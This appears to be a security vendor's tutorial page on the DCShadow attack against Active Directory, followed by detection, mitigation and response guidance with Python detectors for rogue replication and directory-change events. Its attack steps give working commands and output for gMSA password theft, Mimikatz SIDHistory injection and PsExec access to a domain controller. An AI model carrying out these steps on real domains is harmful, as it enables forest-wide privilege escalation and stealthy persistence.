DCShadow Attack using Mimikatz

Active Directory
Defense Evasion
Persistence

DCShadow is a technique in which an attacker abuses compromised replication permissions to mimic a domain controller and push malicious changes into Active Directory. It is often used to plant persistence mechanisms surreptitiously or to escalate privileges across domain trusts.

DCShadow is particularly stealthy because the replication path it abuses does not generate logs that detail the changes made. As a result, an adversary's modifications can be difficult to discover and remove.

Threat Summary

Target: Active Directory
Tools: Mimikatz (the walkthrough also uses DSInternals and PsExec)
ATT&CK® Tactic: Defense Evasion, Persistence
ATT&CK Technique:
Difficulty: Detection Medium, Mitigation Medium, Response Hard

Attack Tutorial: DCShadow Attack using Mimikatz

STEP 1

Compromise an account with administrative permissions

To perform the DCShadow attack, an adversary must first compromise the credentials of an Active Directory account with administrative permissions. Here’s how the password of a poorly secured group managed service account (GMSA), that is, one whose managed password the adversary's current principal is permitted to retrieve, could be compromised:
PS> Install-Module DSInternals -Force
PS> $GMSAPwd = (Get-ADServiceAccount GMSA1 -Prop msDS-ManagedPassword).'msDS-ManagedPassword'
PS> ConvertFrom-ManagedPasswordBlob $GMSAPwd | Select-Object -ExpandProperty CurrentPassword
帙뽐怦渌㉼璿盯粩랜曞꘭�呓ꉷᏤ�뉇ꘉ욚�㡝측퉷ㅓ栤쪇�픸滈್䊟杂瀳谈ꋋ랕軡첤研麛쪡뚗ጵ謗篷협锭褶࡮뻭寞ꁕꈳ¹䲔ᯊ鵋宫鰄먚㹆⻔㚅买嬷滺눲㫚圐ન盢ḟ뼁ጘ䱏ケ蔤䮍⿆߾겋舤쇻ω킌쏑ퟠ쎫�갥挼矤缀醩ℸꆀ뭈Ȩ窢盒२葰霝빶덻妓㼪喟㗾ꖣ뙑ข
PS>

STEP 2

Perform a DCShadow attack

Using the compromised account, the adversary can now replicate objects from Active Directory, make changes to them, and push those changes back to a real domain controller.

The attack includes two parts: 
  • Part 1.  The adversary elevates to SYSTEM and makes changes to the replicated object.
  • Part 2.  The attacker uses the compromised account to push the changes back to a real domain controller.

A common attack path, illustrated below for the user BobT, is to use mimikatz to inject a SIDHistory value for a privileged group in the same or another trusting domain. The SID used in this example represents the Domain Admins group in the parent (or forest root) domain.

Part 1:

PS> .\mimikatz.exe
mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service started
 
mimikatz # !ProcessToken
Token from process 0 to process 0
 * from 0 will take SYSTEM token
 * to 0 will take all 'cmd' and 'mimikatz' process
Token from 4/System
 * to 2232/powershell.exe
 * to 1252/cmd.exe
 * to 4496/mimikatz.exe
 
mimikatz # lsadump::dcshadow /object:"CN=BobT,OU=Employees,DC=sub,DC=domain,DC=com" /attribute:SidHistory /value:S-1-5-21-441320023-234525631-506766575-512
** Domain Info **
 
Domain:         DC=sub,DC=domain,DC=com
Configuration:  CN=Configuration,DC=domain,DC=com
Schema:         CN=Schema,CN=Configuration,DC=domain,DC=com
dsServiceName:  ,CN=Servers,CN=Site2,CN=Sites,CN=Configuration,DC=domain,DC=com
domainControllerFunctionality: 7 ( WIN2016 )
highestCommittedUSN: 468849
 
** Server Info **
 
Server: dc1.sub.domain.com
  InstanceId  : {be2d1604-3232-42f6-9c5b-8a37fbcdd357}
  InvocationId: {b38c988f-c904-4c18-afb3-943f12c12399}
Fake Server (not already registered): wks2.sub.domain.com
 
** Attributes checking **
 
#0: SidHistory
 
** Objects **
 
#0: CN=BobT,OU=Employees,DC=sub,DC=domain,DC=com
  SidHistory (1.2.840.113556.1.4.609-90261 rev 0):
    S-1-5-21-441320023-234525631-506766575-512
    (01050000000000051500000057024e1abf93fa0defa4341e00020000)
 
 
** Starting server **
 
 > BindString[0]: ncacn_ip_tcp:wks2[59644]
 > RPC bind registered
 > RPC Server is waiting!
== Press Control+C to stop ==
  cMaxObjects : 1000
  cMaxBytes   : 0x00a00000
  ulExtendedOp: 0
  pNC->Guid: {5bf57149-701e-47c1-bb39-35577f4ea087}
  pNC->Sid : S-1-5-21-3501040295-3816137123-30697657
  pNC->Name: DC=sub,DC=domain,DC=com
SessionKey: 1ade4b2cd9238108e9cc7c275202b9705c4bca951cbdf0e09b6a061a0e678740
1 object(s) pushed
 > RPC bind unregistered
 > stopping RPC server
 > RPC server stopped

Part 2:

PS> .\mimikatz.exe
mimikatz # lsadump::dcshadow /push
** Domain Info **
 
Domain:         DC=sub,DC=domain,DC=com
Configuration:  CN=Configuration,DC=domain,DC=com
Schema:         CN=Schema,CN=Configuration,DC=domain,DC=com
dsServiceName:  ,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=domain,DC=com
domainControllerFunctionality: 7 ( WIN2016 )
highestCommittedUSN: 1037880
 
** Server Info **
 
Server: dc1.sub.domain.com
  InstanceId  : {ebe88399-c570-4143-bb89-9dc6546b8e09}
  InvocationId: {bef4eddf-eb26-4324-ba9d-abbae40669c5}
Fake Server (not already registered): wks2.sub.domain.com
 
** Performing Registration **
 
** Performing Push **
 
Syncing DC=sub,DC=domain,DC=com
Sync Done
 
** Performing Unregistration **

STEP 3

Use the changes made to achieve further objectives

Finally, the adversary authenticates with the account modified in Step 2 (BobT in this example), which its injected SIDHistory now makes an effective member of Domain Admins in the parent domain, thereby gaining administrative access to the forest root domain and the ability to compromise any domain in the forest.
PS> .\PsExec.exe \\dc1.domain.com powershell.exe
 
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
 
 
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
 
Try the new cross-platform PowerShell https://aka.ms/pscore6
 
PS> hostname
dc1
PS>

Detect, Mitigate and Respond

Detect
Difficulty: Medium
The only concrete way to identify DCShadow is through network monitoring of DRSUAPI RPC requests for the operation DRSUAPI_REPLICA_ADD originating from systems that are not known domain controllers.
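The network check described above, as an added example that is not part of the original page: it runs over constructed log lines laid out like Zeek's dce_rpc.log (operation names follow Zeek's drsuapi naming, which is an assumption here), treats 10.0.0.10 and 10.0.0.11 as the real domain controllers and 10.0.0.57 as an invented rogue workstation, and goes one step beyond the text by also flagging a domain controller that pulls changes from a host that is not a DC.

```python
# Added example (not from the original page): flags drsuapi calls that should
# only ever occur between domain controllers. The log lines are constructed in
# the column layout of Zeek's dce_rpc.log (ts, uid, id.orig_h, id.orig_p,
# id.resp_h, id.resp_p, rtt, named_pipe, endpoint, operation); 10.0.0.57 plays
# the rogue workstation, 10.0.0.10/11 the real DCs.
KNOWN_DC_IPS = {"10.0.0.10", "10.0.0.11"}   # assumption: addresses of the real DCs

DCE_RPC_LOG = """\
1700000000.1\tC1\t10.0.0.10\t49152\t10.0.0.11\t135\t0.01\t-\tepmapper\tept_map
1700000000.2\tC2\t10.0.0.10\t49153\t10.0.0.11\t49155\t0.02\t-\tdrsuapi\tDRSBind
1700000000.3\tC3\t10.0.0.10\t49153\t10.0.0.11\t49155\t0.02\t-\tdrsuapi\tDRSGetNCChanges
1700000000.4\tC4\t10.0.0.57\t59644\t10.0.0.10\t49155\t0.03\t-\tdrsuapi\tDRSBind
1700000000.5\tC5\t10.0.0.57\t59644\t10.0.0.10\t49155\t0.03\t-\tdrsuapi\tDRSReplicaAdd
1700000000.6\tC6\t10.0.0.10\t49154\t10.0.0.57\t59644\t0.03\t-\tdrsuapi\tDRSGetNCChanges
1700000000.7\tC7\t10.0.0.57\t59644\t10.0.0.10\t49155\t0.03\t-\tdrsuapi\tDRSReplicaDel
"""
FIELDS = ("ts", "uid", "orig_h", "orig_p", "resp_h", "resp_p", "rtt",
          "named_pipe", "endpoint", "operation")
# Replication-topology operations (DRSUAPI_REPLICA_ADD/DEL) are what the text
# tells you to watch; DRSBind and DRSCrackNames are also issued by ordinary
# admin tools, so they are not alerted on by themselves.
TOPOLOGY_OPS = {"DRSReplicaAdd", "DRSReplicaDel"}

def parse(log: str) -> list:
    return [dict(zip(FIELDS, line.split("\t"))) for line in log.splitlines() if line]

def dcshadow_indicators(log: str, known_dcs=KNOWN_DC_IPS) -> list:
    """(uid, reason, src, dst) for drsuapi traffic that should not exist."""
    hits = []
    for r in parse(log):
        if r["endpoint"] != "drsuapi":
            continue
        src, dst, op = r["orig_h"], r["resp_h"], r["operation"]
        if op in TOPOLOGY_OPS and src not in known_dcs:
            hits.append((r["uid"], f"{op} from non-DC", src, dst))      # rogue (un)registration
        elif dst not in known_dcs:
            hits.append((r["uid"], f"{op} served by non-DC", src, dst))  # a DC pulling from the rogue host
    return hits
```

Run against a real dce_rpc.log, the DRSReplicaAdd and DRSReplicaDel hits correspond to the "Performing Registration" and "Performing Unregistration" phases shown in the Part 2 output, and the GetNCChanges hit is the real DC fetching the staged object.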

It is also possible to detect certain signs of DCShadow in Windows event logs; however, this approach does not readily show the changes made by the adversary. In order to mimic a domain controller, DCShadow must make several changes in Active Directory:
  • Add a new NTDSDSA object.
  • Add a global catalog (GC/<host>) servicePrincipalName to a computer object that is not a known domain controller.
  • Remove both these items after the attack is completed.
You can analyze events 5136 and 5141, logged under the Audit Directory Service Changes subcategory of the Windows Security log, to look for the creation and deletion of server objects within sites.
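The event-log check above, as an added example that is not from the original page: it evaluates the three artefacts in the list against constructed event records shaped like the EventData of events 5136, 5137 and 5141 (object creation itself is logged as 5137), with dc1 as the real domain controller, wks2 as an invented rogue host and "svc-compromised" as a made-up compromised account.

```python
# Added example (not from the original page): checks Audit Directory Service
# Changes events for the three DCShadow artefacts the text lists. Events are
# constructed dicts mirroring Windows EventData fields; wks2 is the invented
# rogue host, dc1 the real DC, "svc-compromised" a made-up compromised account.
KNOWN_DCS = {"dc1"}       # assumption: hostnames of the legitimate DCs
VALUE_ADDED = "%%14674"   # OperationType code for "value added" in event 5136

EVENTS = [
    {"EventID": "5136", "SubjectUserName": "svc-compromised",   # GC SPN on a workstation
     "ObjectDN": "CN=WKS2,CN=Computers,DC=sub,DC=domain,DC=com",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "GC/wks2.sub.domain.com/sub.domain.com",
     "OperationType": VALUE_ADDED},
    {"EventID": "5137", "SubjectUserName": "svc-compromised",   # nTDSDSA object created
     "ObjectDN": "CN=NTDS Settings,CN=WKS2,CN=Servers,CN=Site2,CN=Sites,CN=Configuration,DC=domain,DC=com"},
    {"EventID": "5141", "SubjectUserName": "svc-compromised",   # server object removed afterwards
     "ObjectDN": "CN=WKS2,CN=Servers,CN=Site2,CN=Sites,CN=Configuration,DC=domain,DC=com"},
    {"EventID": "5136", "SubjectUserName": "DC1$",              # benign: a real DC's own SPN
     "ObjectDN": "CN=DC1,OU=Domain Controllers,DC=sub,DC=domain,DC=com",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "GC/dc1.sub.domain.com/sub.domain.com",
     "OperationType": VALUE_ADDED},
]

def is_site_server_object(dn: str) -> bool:
    """server and nTDSDSA objects live under CN=Servers,CN=<site>,CN=Sites."""
    return ",CN=Servers," in dn and ",CN=Sites,CN=Configuration," in dn

def named_host(dn: str) -> str:
    # Host the DN describes: the CN just before ',CN=Servers,', else the first RDN.
    if is_site_server_object(dn):
        return dn.split(",CN=Servers,")[0].split(",")[-1].split("=", 1)[1].lower()
    return dn.split(",")[0].split("=", 1)[1].lower()

def dcshadow_findings(events: list, known_dcs=KNOWN_DCS) -> list:
    """One finding per suspicious event; an empty list means nothing matched."""
    findings = []
    for e in events:
        eid, dn, who = e["EventID"], e["ObjectDN"], e.get("SubjectUserName", "?")
        host = named_host(dn)
        if host in known_dcs:
            continue                          # objects belonging to real DCs are expected
        if (eid == "5136" and e.get("AttributeLDAPDisplayName") == "servicePrincipalName"
                and e.get("OperationType") == VALUE_ADDED
                and e.get("AttributeValue", "").upper().startswith("GC/")):
            findings.append(f"GC SPN added to non-DC computer {host} by {who}")
        elif eid in ("5136", "5137") and is_site_server_object(dn):
            findings.append(f"server/nTDSDSA object for non-DC {host} written by {who}")
        elif eid == "5141" and is_site_server_object(dn):
            findings.append(f"server object for non-DC {host} deleted by {who}")
    return findings
```

Because the rogue server object is deleted again at the end of the attack (the 5141 case), the create and delete findings for the same host within a short window are the pair worth alerting on.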
Mitigate
Difficulty: Medium
Because DCShadow abuses features and privileges of Active Directory, it is not possible to eliminate this attack entirely. However, the following strategies can help reduce the risk that an adversary can successfully obtain the privileges necessary to execute the attack:
  • Use host-based firewalls to constrain lateral movement. For example, firewall policies should allow RDP or other remote management only from a small number of approved, controlled and monitored systems.
  • Do not allow users to possess administrative privileges across security boundaries. This greatly reduces how much an adversary can escalate their privileges.
  • Constrain the number of users with permissions to add computer objects to Active Directory.
  • Reduce and tightly govern built-in privileged groups and delegated administrative permissions.
  • Adopt good Active Directory hygiene. In particular, remove unused sites and computer objects.
Respond
Difficulty: Hard
DCShadow requires an adversary to have obtained substantial (e.g., Domain Admins) privileges in Active Directory. If this is detected, you should assume a total compromise of Active Directory and take the following steps:
  • Activate the incident response process and alert the incident response team.
  • Identify and quarantine implicated computers for forensic investigation and remediation activities.

MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation.